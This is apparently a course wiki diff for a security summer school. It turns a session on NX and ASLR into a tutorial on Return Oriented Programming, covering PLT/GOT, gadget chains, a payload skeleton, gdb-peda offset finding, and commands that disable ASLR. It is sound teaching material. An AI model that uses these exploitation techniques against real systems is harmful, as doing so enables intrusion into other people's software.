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session:09 [2019/07/04 20:16]
Razvan Deaconescu
session:09 [2020/07/19 12:49] (current)
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-0x09Defense Mechanisms+====== 0x08Return Oriented Programming ======
-== Resources+===== Resources =====
-[[|Slides]]+[[|Session 08 slides]]
-[[|Activities archive]]+[[|Session's tutorials and challenges repo]]
-== Tutorials+[[|Session's solutions]]
-The previous sessions ([[:session:07]] and [[:session:08]]) presented an exploitation scenario that is based on the assumption that machine instructions can be executed from **any** memory segment belonging to the process. As you can recall from [[session:03]], different sections of an ELF binary are grouped into segments which are loaded into memory when the binary is being executed. This mechanism (and some hardware support) enables 2 important protection mechanisms that will be presented in this session: executable space protection, and address space layout randomization. Besides presenting the 2 mechanisms, we are also going to take a quick look at how can we bypass them. Since these protections are ubiquitous at this time, you will have to work around them almost every time you build a binary exploit. 
-<note warning> +=== PLT and GOT ===
-The tasks today are designed for 32 bit executables. Make sure you compile with the ''%%-m32%%'' flag for ''gcc''+
-The binaries in the tasks archive are already compiled as such.  +
-=== Executable Space Protection+ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time you actually know the address of a shared library is while the loader is running. The ASLR feature is orthogonal to this - the loader could choose to assign address to libraries in a round-robin fashion, or could use ASLR to assign them randomly.
-The **executable space protection** is an instance of the **principle of least privilege**which is applied in many security sensitive domains. In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. A memory region (i.e., page) can have the following protection levels: READ, WRITE, and EXECUTE. The executable space protection mandates that writable regions should not be executable at the same time.+Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the librariesbut this breaks the memory access protection of the ''.text'' sectionwhich should only be **readable** and **executable**.
-The mechanism can be (and wasimplemented in many different ways, the most common in Linux being:+To solve this problems we need another level of indirection: all memory accessed to symbols located in shared libraries will read the actual address from a table, called **Global Offset Table (''.got'')**, at runtime. The loader will populate this table. Note that this can work both for data accesses, as well as for function calls, however function calls are actually using a small stub (i.e., a few instructionsstored in the **Procedure Linkage Table (''.plt'')**.
-**NX bit:** This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is current implementation in 64-bit processors where page table entries are 8-bytes wide.+The PLT is responsible of finding the shared library function address when it is first called (**lazy binding**), and writing it to a GOT entry. Note that the function pointers are stored in ''.got.plt''). The following calls use the pre-resolved address.
-**Physical Address Extension (PAE):** Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processor also adds NX bit in its page table entries.+Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls ''puts()''.
-**Emulation:** The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit ([[|PaX PAGEEXEC]]), or by using the segmentation mechanism and splitting the address space in half ([[|PaX SEGMEXEC]]).+<code bash> 
 +~$ objdump --.text -M intel hello | grep puts       
 +<code text> 
 + 80483e4: e8 07 ff ff ff        call   80482f0 <puts@plt> 
-<note> +We can see that the ''.plt'' section will start at address ''0x080482e0''right where the previous call will jump:
-This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtimeand that is later executed. Since a JIT compiler cannot run in this kind of secured environment, an application using it is vulnerable to attacks known as **JIT spraying**. The idea was first presented by Dion Blazakis, and is, briefly, a way to force the JIT compiler to produce shellcode.+
-    * Slides: [[|Black Hat & DEF CON 2010]] +<code bash> 
-    * Paper: [[|Interpreter Exploitation. Pointer Inference and JIT Spraying]]+~$ readelf --sections hello 
-</note>+<code text> 
 +  [12] .plt              PROGBITS        080482e0 0002e0 000040 04  AX  0   0 16 
-There are of course other implementations in different hardening-oriented projects such asOpenBSD [[|W^X]], Red Hat [[|Exec Shield]], PaX (which is now part of [[|grsecurity]]), Windows Data Execution Prevention ([[|DEP]]).+Let's see how the code there looks like:
-==== Walk-through+<code bash> 
 +~$ objdump -D -j .plt -M intel hello | grep -A 3 '<puts@plt>' 
-The Linux kernel provides support for managing memory protections in the ''%%mmap()%%'' and ''%%mprotect()%%'' syscalls. These syscalls are used by the loader to set protection levels for each segment it loads when running a binary. Of course, the same functions can also be used during execution.+<code text> 
 +080482f0 <puts@plt>: 
 + 80482f0: ff 25 00 a0 04 08    jmp    DWORD PTR ds:0x804a000 
 + 80482f6: 68 00 00 00 00        push   0x0 
 + 80482fb: e9 e0 ff ff ff        jmp    80482e0 <_init+0x30> 
-<note important> +We see it jumping to pointer stored at ''0x804a000'' in the data section. Let'check the binary relocations for that location:
-PaX has protection option that restricts the use of ''%%mprotect()%%'' and ''%%mmap()%%'' to avoid resetting the permissions during executionSee [[|MPROTECT]]. Note that grsecurity/PaX are patches to the kernel, and are not available in normal distributions. You have to compile your own kernel if you want to try them out. +
-</note> +
- +
-Let'start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. We can do this in two ways, as told below: +
- +
-To disable ASLR system-wide we use (root access is required):+
 <code bash> <code bash>
-~$ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'+~$ readelf --relocs hello
 </code> </code>
-To create a shell with ASLR disabled (ASLR will also be disabled for future processes spawned from that shell)we use (root access is not required):+<code text> 
 +Relocation section '.rel.plt' at offset 0x298 contains 3 entries: 
 + Offset     Info    Type            Sym.Value  Sym. Name 
 +0804a000  00000107 R_386_JUMP_SLOT   00000000   puts 
 +Okgood, but what is actually stored at this address initially?
 <code bash> <code bash>
-~$ setarch $(uname -m) -R /bin/bash+~$ objdump --M intel -j .got.plt --start-address=0x0804a000 hello
 </code> </code>
-Let's first compile an extremely simple C application:+<code text> 
 +hello    file format elf32-i386
-<code c> +Contents of section .got.plt: 
-int main() { + 804a000 f6820408 06830408 16830408           ............
-    while (1); +
 </code> </code>
 +We recognize ''f6820408'' (''0x80482f6'') as being the next instruction in the ''puts@plt'' stub that we disassembled above. Which then pushes 0 in the stack and calls ''0x80482e0''. This is the call to the one-time resolver, and it looks like this:
 <code bash> <code bash>
-~$ CFLAGS='-m32 -O0' make hello+~$ objdump --j .plt -M intel hello | grep -A 3 '080482e0'
 </code> </code>
-As presented in [[session:04]],​ the ELF format contains flags for each segment that specify what permissions should be granted. You can use ''​%%readelf -l hello%%''​ to dump all program headers for this binary.+<code text> 
 +080482e0 <puts@plt-0x10>: 
 + 80482e0: ff 35 f8 9f 04 08    push   DWORD PTR ds:0x8049ff8 
 + 80482e6: ff 25 fc 9f 04 08    jmp    DWORD PTR ds:0x8049ffc 
 + 80482ec: 00 00                add    BYTE PTR [eax],al 
-Program Headers: +Going further into the resolver is left as an exerciseYou can use GDB to inspect the address in ''0x8049ffc'', and what happens when this jumps there
-  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align +</note>
-  PHDR           0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4 +
-  INTERP         0x000154 0x08048154 0x08048154 0x00013 0x00013 R   0x1 +
-      [Requesting program interpreter: /lib/] +
-  LOAD           0x000000 0x08048000 0x08048000 0x00568 0x00568 R E 0x1000 +
-  LOAD           0x000f08 0x08049f08 0x08049f08 0x00114 0x00118 RW  0x1000 +
-  DYNAMIC        0x000f14 0x08049f14 0x08049f14 0x000e8 0x000e8 RW  0x4 +
-  NOTE           0x000168 0x08048168 0x08048168 0x00044 0x00044 R   0x4 +
-  GNU_EH_FRAME   0x000490 0x08048490 0x08048490 0x0002c 0x0002c R   0x4 +
-  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x10 +
-  GNU_RELRO      0x000f08 0x08049f08 0x08049f08 0x000f8 0x000f8 R   0x1+
- Section to Segment mapping: +What's going on here? What's actually happening is //lazy binding// — by convention when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOTTherefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, it simply jumps to the next instructionThe identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out "hey, this program is trying to find the function foo"It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stubIngenious!
-  Segment Sections... +
-   00      +
-   01     .interp  +
-   02     .interp .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame  +
-   03     .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss  +
-   04     .dynamic  +
-   05     .note.ABI-tag  +
-   06     .eh_frame_hdr  +
-   07      +
-   08     .init_array .fini_array .jcr .dynamic .got +
-Check the ''​%%Flg%%''​ column. For example, the first ''​LOAD''​ segment contains ''​.text''​ and is marked ''​R E'',​ while the ''​GNU_STACK''​ segment is marked ''​RW ''​.+==== Return Oriented Programming ====
-Next we are interested in seeing calls to ''​%%mmap2()%%''​ and ''​%%mprotect()%%''​ made by the loader. We are going to use the ''​strace''​ tool for this, and directly execute the loader. You can check the path to the loader on your system using ''​ldd hello''.+{{ :session:rop.png?nolink&600 |}}
-<code bash+=== Motivation === 
-~$ strace -mmap2,mprotect /lib/ ./hello+In the previous sessions we discussed ''ret2libc'' attacks. The standard attack was to overwrite in the following way: 
 +RET + 0x00:   addr of system 
 +RET + 0x04:   JUNK 
 +RET + 0x08:   address to desired command (e.g'/bin/sh')
 </code> </code>
-<code text+However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? The payload should be: 
-[ Process PID=11198 runs in 32 bit mode. ] +<code> 
-mmap2(0x8048000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0= 0x8048000 +RET + 0x00:   addr of f1 
-mmap2(0x8049000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0= 0x8049000 +RET + 0x04:   addr of f2 (return address after f1 finishes
-mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0= 0xfffffffff7ffc000 +RET + 0x08:   JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called
-mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0= 0xfffffffff7ffa000 +RET + 0x0c:   0xAB (param1 of f2
-mmap2(NULL, 156324, PROT_READ, MAP_PRIVATE, 3, 0) = 0xfffffffff7fd3000 +RET + 0x10:   0xCD (param2 of f2
-mmap2(NULL1763964, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0= 0xfffffffff7e24000 +</code> 
-mmap2(0xf7fcd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 30x1a9000= 0xfffffffff7fcd000 +What about if we need to call f1(0xAB0xCDand then f2(0xEF0x42? 
-mmap2(0xf7fd0000, 10876, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0= 0xfffffffff7fd0000 +<code> 
-mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0= 0xfffffffff7e23000 +RET + 0x00:   addr of f1 
-mprotect(0xf7fcd000, 8192, PROT_READ  = 0 +RET + 0x04:   addr of f2 (return address after f1 finishes
-mprotect(0x8049000, 4096, PROT_READ   = 0 +RET + 0x08:   0xAB (param1 of f1  
-mprotect(0x56575000, 4096, PROT_READ  = 0+RET + 0x0c:   0xCD (param2 of f1 but this should also be 0xEF (param1 of f2
 +RET + 0x10:   0x42 (param2 of f2
 </code> </code>
-We can observe ​a ''​PROT_READ|PROT_EXEC''​ mapping ​at address 0x8048000followed by a ''​PROT_READ|PROT_WRITE''​ at address 0x8049000 ​that is later changed to ''​PROT_READ''​ for the first half (4096 bytes). The later allocation is the data segment, that should be writable. We can also see a bunch of allocations ​for segments belonging to dynamic libraries.+This kind of conflict can be resolved using Return Oriented Programming, a generalization of ''ret2libc'' attacks.
-<note important> +=== NOP analogy === 
-Note that the **stack** is not explicitly allocated by the loader. The kernel will keep increasing it each time a page fault is triggered without calling ​''​mmap''​. ​Alsothe **heap** will be extended on-demand as the application requires it+While ''ret2libc'' uses functions directlyReturn Oriented Programming uses a finer level of code execution: instruction groups. 
-</note>+Let's explore an example: 
 +<code c> 
 +int main() 
 + char a[16]; 
 + read(0, a, 100);
-We can dump all memory mappings ​of the still running process as follows:+ return 0; 
 +This code obviously suffers from a stack buffer overflow. The offset to the return address is 28. So dwords from offset 28 onwards will be popped from the stack and executed. 
 +Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions ("\x90") used to pad a payload for alignment purposes. 
 +Since we can't add any new code to the program (NX is enabled) how could we simulate the effect of a NOP sled? Easy! Using return instructions! 
 +# objdump  -d a -M intel | grep $'\t'ret 
 + 80482dd: c3                    ret     
 + 804837a: c3                    ret     
 + 80483b7: c3                    ret     
 + 8048437: c3                    ret     
 + 8048444: c3                    ret     
 + 80484a9: c3                    ret     
 + 80484ad: c3                    ret     
 + 80484c6: c3                    ret     
 +Any and all of these addresses will be ok. The payload could be the following: 
 +RET + 0x00:   0x80482dd 
 +RET + 0x04:   0x80482dd 
 +RET + 0x08:   0x80482dd 
 +RET + 0x0c:   0x80482dd 
 +RET + 0x10:   0x80482dd 
 +The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to it. When it gets popped the stack is automatically increased by 4 (on to the next value). The instruction at ''0x80482dd'' is another ''ret'' which does the same thing as before. This goes on until another address is popped off the stack that is not a ''ret''.
-<code bash+That payload is not the only option. We don't really care which ''ret'' we pick. The payload could very well look like this: 
-~$ ps u | grep /lib/  +<code> 
-...  +RET + 0x00:   0x80482dd 
-~$ cat /proc/11198/maps+RET + 0x04:   0x804837a 
 +RET + 0x08:   0x80483b7 
 +RET + 0x0c:   0x8048437 
 +RET + 0x10:   0x80484c6 
 </code> </code>
 +Notice the addresses are different but because they all point to a ''ret'' instruction they will all have the same net effect on the code flow.
-<note important>​  +<note warning
-Make sure to use the PID of the loader process, and not the ''​strace'' ​process+Take a moment to fully understand what is happening here. Run your own program and step through the payload to see this in action before proceeding. 
 +Follow along using this skeleton to generate the payloads.
 </note> </note>
 +<file python>
 +import struct, sys
-<code bash> +def dw(i): 
-~$ cat /proc/11198/maps + return struct.pack("<I", i)
-<code text> +#TODO update count for your prog 
-08048000-08049000 r-xp 00000000 00:22 5769082                            /home/vladum/sss/session10/hello +pad_count_to_ret = 100 
-08049000-0804a000 r--p 00000000 00:22 5769082                            /home/vladum/sss/session10/hello +payload = "X" * pad_count_to_ret
-0804a000-0804b000 rw-p 00001000 00:22 5769082                            /home/vladum/sss/session10/hello +
-56555000-56575000 r-xp 00000000 08:05 827365                             /lib/i386-linux-gnu/ +
-56575000-56576000 r--p 0001f000 08:05 827365                             /lib/i386-linux-gnu/ +
-56576000-56577000 rw-p 00020000 08:05 827365                             /lib/i386-linux-gnu/ +
-f7e23000-f7e24000 rw-p 00000000 00:00 0  +
-f7e24000-f7fcd000 r-xp 00000000 08:05 823395                             /lib/i386-linux-gnu/ +
-f7fcd000-f7fcf000 r--p 001a9000 08:05 823395                             /lib/i386-linux-gnu/ +
-f7fcf000-f7fd0000 rw-p 001ab000 08:05 823395                             /lib/i386-linux-gnu/ +
-f7fd0000-f7fd3000 rw-p 00000000 00:00 0  +
-f7ffa000-f7ffd000 rw-p 00000000 00:00 0  +
-f7ffd000-f7ffe000 r-xp 00000000 00:00 0                                  [vdso] +
-fffdd000-ffffe000 rw-p 00000000 00:00 0                                  [stack] +
-==== Bypassing NX+#TODO figure out the rop chain 
 +payload +dw(0xcafebeef) 
 +payload +dw(0xdeadc0de)
-**ret-to-plt/libc.** You can return to the ''.plt'' section and call library function already linked. You can also call other library functions based on their known offsets. The latter approach assumes no ASLR (see next section), or the possibility of an information leak. 
-**mprotect().** If the application is using ''mprotect()'' you can easily call it to modify the permissions and include ''PROT_EXEC'' for the stack. You can also call this in a ''ret-to-libc'' attack. You can also ''mmap'' a completely new memory region and dump the shellcode there.+sys.stdout.write(payload)
-**Return Oriented Programming (ROP).** This is a generalization of the ret-to-* approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, it will be discussed in depth in a future section.+</file>
-=== Address Space Layout Randomization 
-Address Space Layout Randomization (ASLR) is a security feature that maps different memory regions of an executable at random addressesThis prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary)Usually, the sections that are randomly mapped arethe stack, the heap, the VDSO page, and the dynamic libraries. The code section can also be randomly mapped for [[|PIE]] binaries.+=== Gadgets & ROP chains === 
 +Now that we have a sort of neutral primitive equivalent to a NOP let's actually do something useful. 
 +The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a 'ret' instruction. 
 +Here are some 'gadgets' from the previous program: 
 +0x8048443: pop ebp; ret 
 +0x80484a7pop edi; pop ebp; ret 
 +0x8048441: mov ebp,esp; pop ebp; ret 
 +0x80482da: pop eax; pop ebx; leave; ret 
 +0x80484c3: pop ecx; pop ebx; leave; ret 
-<note important+By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want. 
-Linux allows 3 options for its ASLR implementation that can be configured using the ''/proc/sys/kernel/randomize_va_space'' file. Writing 0, 1, or 2 to this will results in the following behaviors: +As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like: 
-  * **0**: deactivated +<code
-  * **1**random stack, vdsolibrariesheap is after code section; random code section (only for PIE-linked binaries+RET + 0x00:   0x80482da  (pop eax; pop ebx; leave; ret) 
-  * **2**: random heap too+RET + 0x04:   0x41424344 
 +RET + 0x08:   0x61626364 
 +RET + 0x0c:   0xAABBCCDD ??? 
 +  * First the ret addr is popped from the stack and execution goes there. 
 +  * At ''pop eax'' 0x41424344 is loaded into eax and the stack is increased 
 +  * At ''pop ebx'' 0x61626364 is loaded into ebx and the stack is increased again 
 +  * At ''leave'' two things actually happen"mov espebppop ebp". So the stack frame is decreased to the previous one (pointed by ebpand ebp is updated to the one before that. So esp will now be the old ebp+4 
 +  * At ''ret'' code flow will go to the instruction pointed to by ebp+4. This implies that execution will __not__ go to 0xAABBCCDD but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). If it is in our control we can overwrite that address with the rest of the ROP chain.
-</note>+We have now seen how gadgets can be useful if we want the CPU to achieve a certain state. This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers. 
 +As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters: 
 +  * 1st param: RDI 
 +  * 2nd param: RSI 
 +  * 3rd param: RDX 
 +Next we would need gadgets for each. Let's assume these 2 scenarios: 
 +Scenario 1: 
 +0x400124:  pop rdi; pop rsi; ret 
 +0x400235:  pop rdx; ret 
 +0x400440:  f1()
-Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below.+Payload: 
 +RET + 0x00:   0x400124 
 +RET + 0x08:   val of RDI (0xAB) 
 +RET + 0x10:   val of RSI (0xCD) 
 +RET + 0x18:   0x400235 
 +RET + 0x20:   val of RDX 
 +RET + 0x28:   f1 
-If you disabled ASLR system-wide, re-enable it using (root access is required):+Scenario 2: 
 +0x400125:  pop rdi; ret 
 +0x400252:  pop rsi; ret 
 +0x400235:  pop rdx; ret 
 +0x400440:  f1()
-<code bash> +Payload: 
-~$ sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space'+RET + 0x00:   0x400125 
 +RET + 0x08:   val of RDI (0xAB) 
 +RET + 0x10:   0x400252 
 +RET + 0x18:   val of RSI (0xCD) 
 +RET + 0x20:   0x400235  
 +RET + 0x28:   val of RDX 
 +RET + 0x30:   f1
 </code> </code>
 +Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide)
-If you disabled ASLR at shell level, simply **close the shell** such as issuing the ''Ctrl+d'' keyboard shortcut. 
-We can easily demonstrate the effects on shared libraries by running ''ldd'' multiple times in a row on a binary such as ''/bin/ls''.+The second use of gadgets is to clear the stack. Remember the issue we had in the **Motivation** section? Let's solve it using gadgets. 
 +We need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42). Our initial solution was: 
 +RET + 0x00:   addr of f1 
 +RET + 0x04:   addr of f2 (return address after f1 finishes) 
 +RET + 0x08:   0xAB (param1 of f1)   
 +RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2) 
 +RET + 0x10:   0x42 (param2 of f2)  
-==== PLT and GOT+The problem is that those parameters of f1 are getting in the way of calling f2. We need to find a **pop pop ret** gadget. The actual registers are not important.
-ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different waysso the first time you actually know the address of a shared library is while the loader is running. The ASLR feature is orthogonal to this - the loader could choose to assign address to libraries in a round-robin fashionor could use ASLR to assign them randomly.+<code> 
 +RET + 0x00:   addr of f1 
 +RET + 0x04:   addr of (pop eaxpop ebx, ret)  
 +RET + 0x08:   0xAB (param1 of f1)   
 +RET + 0x0c:   0xCD (param2 of f1) 
 +RET + 0x10:   addr of f2 
 +RET + 0x14:   JUNK 
 +RET + 0x18:   0xEF (param1 of f2) 
 +RET + 0x1c:   0x42 (param2 of f2)  
 +Now we can even call the next function f3 if we repeat the trick: 
 +RET + 0x00:   addr of f1 
 +RET + 0x04:   addr of (pop eaxpop ebx, ret)  
 +RET + 0x08:   0xAB (param1 of f1)   
 +RET + 0x0c:   0xCD (param2 of f1) 
 +RET + 0x10:   addr of f2 
 +RET + 0x14:   addr of (pop eax, pop ebx, ret)  
 +RET + 0x18:   0xEF (param1 of f2) 
 +RET + 0x1c:   0x42 (param2 of f2)  
 +RET + 0x20:   addr of f3 
-Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the ''.text'' section, which should only be **readable** and **executable**. 
-To solve this problems we need another level of indirection: all memory accessed to symbols located in shared libraries will read the actual address from a table, called **Global Offset Table (''.got'')**, at runtime. The loader will populate this table. Note that this can work both for data accesses, as well as for function calls, however function calls are actually using a small stub (i.e., a few instructions) stored in the **Procedure Linkage Table (''.plt'')**.+==== Some useful ninja tricks ====
-The PLT is responsible of finding the shared library function address when it is first called (**lazy binding**), and writing it to GOT entry. Note that the function pointers are stored in ''.got.plt''). The following calls use the pre-resolved address.+=== Memory spraying === 
 +Let's take the following prog: 
 +<code c> 
 +int main() 
 +        int xy ,z; 
 +        char a,b,c; 
 +        char buf[23]; 
 +        read(0, buf, 100);
-Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls ''puts()''. +        return 0; 
- +}
-<code bash> +
-~$ objdump -D -j .text -M intel hello | grep puts       +
-</code> +
-<code text> +
- 80483e4: e8 07 ff ff ff        call   80482f0 <puts@plt>+
 </code> </code>
-We can see that the ''.plt'' section will start at address ''0x080482e0'', right where the previous call will jump:+A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need ? 
 +There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly. 
 +A [[ | De Bruijn sequence ]] is a string of symbols out of a given alphabet  in which each consecutive K symbols only appear once in the whole string. If we can construct such a string out of printable characters then we only need to know the Segmentation Fault address. Converting it back to 4 bytes and searching for it in the initial string will give us the exact offset to the return address.
 +Peda can help you do this. Here's how:
 <code bash> <code bash>
-~$ readelf --sections hello +gdb-peda$ help pattern_create  
-</code>+Generate a cyclic pattern 
 +    pattern_create size [file]
-<code text> +gdb-peda$ pattern_create 100 
-  [12] .plt              PROGBITS        080482e0 0002e0 000040 04  AX  0   0 16 +
-... +
-Let's see how the code there looks like:+gdb-peda$ help pattern_offset  
 +Search for offset of a value in cyclic pattern 
 +    pattern_offset value
-<code bash> +gdb-peda$ pattern_offset AA8A 
-~$ objdump -D -j .plt -M intel hello | grep -A 3 '<puts@plt>'+AA8A found at offset: 76
 </code> </code>
-<code text+Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised: 
-080482f0 <puts@plt>: +<code bash
- 80482f0: ff 25 00 a0 04 08    jmp    DWORD PTR ds:0x804a000 +# gdb -q ./a 
- 80482f6: 68 00 00 00 00        push   0x0 +Reading symbols from ./a...(no debugging symbols found)...done. 
- 80482fb: e9 e0 ff ff ff        jmp    80482e0 <_init+0x30> +gdb-peda$ pattern_create 200 
 +gdb-peda$ run 
 +Program received signal SIGSEGV, Segmentation fault. 
 +EAX: 0x0  
 +EBX: 0xf7f97e54 --0x1a6d5c  
 +EDX0x64 ('d'
 +EDI: 0x0  
 +EBP0x41334141 ('AA3A') 
 +EIP: 0x41414541 ('AEAA'
 +EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) 
 +Invalid $PC address: 0x41414541 
 +0024| 0xffffcd88 ("HAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"
 +0028| 0xffffcd8c ("AA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"
 +0032| 0xffffcd90 ("AIAAiAA8AAJAAjAA9AAKAAkAALAAl"
 +0036| 0xffffcd94 ("iAA8AAJAAjAA9AAKAAkAALAAl"
 +0040| 0xffffcd98 ("AAJAAjAA9AAKAAkAALAAl"
 +0044| 0xffffcd9c ("AjAA9AAKAAkAALAAl"
 +0048| 0xffffcda0 ("9AAKAAkAALAAl"
 +0052| 0xffffcda4 ("AAkAALAAl"
 +0056| 0xffffcda8 ("ALAAl"
 +0060| 0xffffcdac --0x6c ('l'
 +Legend: code, data, rodata, value 
 +Stopped reason: SIGSEGV 
 +0x41414541 in ?? ()
-We see it jumping to a pointer stored at ''0x804a000'' in the data section. Let's check the binary relocations for that location: 
-<code bash> 
-~$ readelf --relocs hello 
-<code text> +gdb-peda$ pattern_search  
-... +Registers contain pattern buffer: 
-Relocation section '.rel.plt' at offset 0x298 contains 3 entries+EIP+0 found at offset: 35 
- Offset     Info    Type            Sym.Value  Sym. Name +EBP+0 found at offset: 31 
-0804a000  00000107 R_386_JUMP_SLOT   00000000   puts +Registers point to pattern buffer: 
-...+[ECX] --> offset 0 - size ~100 
 +[ESP] --> offset 39 - size ~61 
 +Pattern buffer found at: 
 +0xffffcd49 : offset    0 - size  100 ($sp + -0x27 [-10 dwords]) 
 +0xffffd1c6 : offset 23424 - size    4 ($sp + 0x456 [277 dwords]) 
 +0xffffd1d8 : offset 22930 - size    4 ($sp + 0x468 [282 dwords]) 
 +0xffffd276 : offset 48535 - size    4 ($sp + 0x506 [321 dwords]) 
 +References to pattern buffer found at: 
 +0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords]) 
 +0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords]) 
 </code> </code>
-Ok, good, but what is actually stored at this address initially? 
 +=== Vulnerable function identification ===
 +As you can see from above, the base pointer gets trashed so backtracing is not possible
 <code bash> <code bash>
-~objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello+gdb-pedabt 
 +#0  0x41414541 in ?? () 
 +#1  0x34414165 in ?? () 
 +#2  0x41464141 in ?? () 
 +#3  0x41416641 in ?? ()
 </code> </code>
 +If this program was larger you wouldn't know which "ret" is the last one executed before jumping into the payload.
 +You can set a breakpoint on all declared functions (if the program has not been stripped) using **rbreak** and then ignoring them:
 +<code bash>
 +gdb-peda$ rbreak 
 +Breakpoint 1 at 0x80482d4
 +<function, no debug info> _init;
 +Breakpoint 2 at 0x8048310
 +<function, no debug info> read@plt;
 +Breakpoint 3 at 0x8048320
 +<function, no debug info> __gmon_start__@plt;
 +Breakpoint 4 at 0x8048330
 +<function, no debug info> __libc_start_main@plt;
 +Breakpoint 5 at 0x8048340
 +<function, no debug info> _start;
 +Breakpoint 6 at 0x8048370
 +<function, no debug info> __x86.get_pc_thunk.bx;
 +Breakpoint 7 at 0x804843f
 +<function, no debug info> main;
 +Breakpoint 8 at 0x8048470
 +<function, no debug info> __libc_csu_init;
 +Breakpoint 9 at 0x80484e0
 +<function, no debug info> __libc_csu_fini;
 +Breakpoint 10 at 0x80484e4
 +<function, no debug info> _fini;
-<code text> 
-hello:     file format elf32-i386 
-Contents of section .got.plt+gdb-peda$ commands 
- 804a000 f6820408 06830408 16830408           ............+Type commands for breakpoint(s) 1-10, one per line. 
 +End with a line saying just "end". 
 +gdb-peda$ run 
 +Starting program/ctf/Hexcellents/summerschool2014/lab_material/session-12/tut1/ 
 +warning: the debug information found in "/usr/lib64/debug/lib64/" does not match "/lib/" (CRC mismatch). 
 +warning: Could not load shared library symbols for 
 +Do you need "set solib-search-path" or "set sysroot"? 
 +Breakpoint 4, 0x08048330 in __libc_start_main@plt () 
 +Breakpoint 8, 0x08048470 in __libc_csu_init () 
 +Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () 
 +Breakpoint 1, 0x080482d4 in _init () 
 +Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () 
 +Breakpoint 7, 0x0804843f in main () 
 +Breakpoint 2, 0x08048310 in read@plt () 
 +Program received signal SIGSEGV, Segmentation fault. 
 +0x41414541 in ?? ()
 </code> </code>
-We recognize ''f6820408'' (''0x80482f6'') as being the next instruction in the ''puts@plt'' stub that we disassembled above. Which then pushes 0 in the stack and calls ''0x80482e0''. This is the call to the one-time resolver, and it looks like this: 
 +=== ROP payload debugging ===
 +When you know what the offending function is, disassemble it and break on "ret"
 <code bash> <code bash>
-~$ objdump -D -j .plt -M intel hello | grep -A '080482e0' +gdb-peda$ pdis main 
-</code>+Dump of assembler code for function main: 
 +   0x0804843c <+0>: push   ebp 
 +   0x0804843d <+1>: mov    ebp,esp 
 +   0x0804843f <+3>: and    esp,0xfffffff0 
 +   0x08048442 <+6>: sub    esp,0x30 
